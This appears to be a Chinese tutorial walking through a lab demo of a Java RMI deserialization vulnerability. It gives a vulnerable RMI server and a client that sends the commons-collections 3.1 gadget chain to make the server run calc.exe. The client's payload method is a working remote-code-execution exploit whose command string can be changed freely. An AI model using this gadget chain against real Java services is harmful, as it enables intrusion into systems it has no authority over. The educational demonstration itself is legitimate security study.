1.背景
2.反序列化漏洞出现的环境
jdk1.7
commons-collections 3.1
<dependency>
<artifactId>commons-collections</artifactId>
<groupId>commons-collections</groupId>
<version>3.1</version>
</dependency>
3.JAVA代码
Remote接口
import java.rmi.Remote;
import java.rmi.RemoteException;
/**
* author: zhanggw
* 创建时间: 2021/12/17
*/
public interface User extends Remote {
void work(Object obj) throws RemoteException;
}
实现类
import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;
/**
* author: zhanggw
* 创建时间: 2021/12/17
*/
public class UserImpl extends UnicastRemoteObject implements User {
protected UserImpl() throws RemoteException {
}
@Override
public void work(Object obj) throws RemoteException {
System.out.println(obj.toString());
System.out.println("work被调用了");
}
}
Registry
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
/**
* author: zhanggw
* 创建时间: 2021/12/17
*/
public class RegistryServer {
public static void main(String[] args) throws Exception {
User user = new UserImpl();
Registry registry = LocateRegistry.createRegistry(1099);
registry.rebind("user", user);
System.out.println("rmi running....");
}
}
rmi客户端
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.rmi.Naming;
import java.util.HashMap;
import java.util.Map;
/**
* author: zhanggw
* 创建时间: 2021/12/17
*/
public class ClientDemo {
public static void main(String[] args) throws Exception{
String url = "rmi://192.168.1.106:1099/user";
User userClient = (User) Naming.lookup(url);
userClient.work(getPayload());
}
public static Object getPayload() throws Exception{
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
};
Transformer transformerChain = new ChainedTransformer(transformers);
// Map map = new HashMap();
Map<String, String> map = new HashMap<>();
map.put("value", "sijidou");
Map transformedMap = TransformedMap.decorate(map, null, transformerChain);
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
ctor.setAccessible(true);
return ctor.newInstance(Retention.class, transformedMap);
}
}
4.模拟
先运行RegistryServer类
再运行 ClientDemo,运行后就会弹出RegistryServer所在电脑的计算器,原理是通过java rmi服务器远端在接收客户端序列化对象后,对该对象进行反序列化时,执行了被注入的病毒代码Runtime.getRuntime().exec("calc");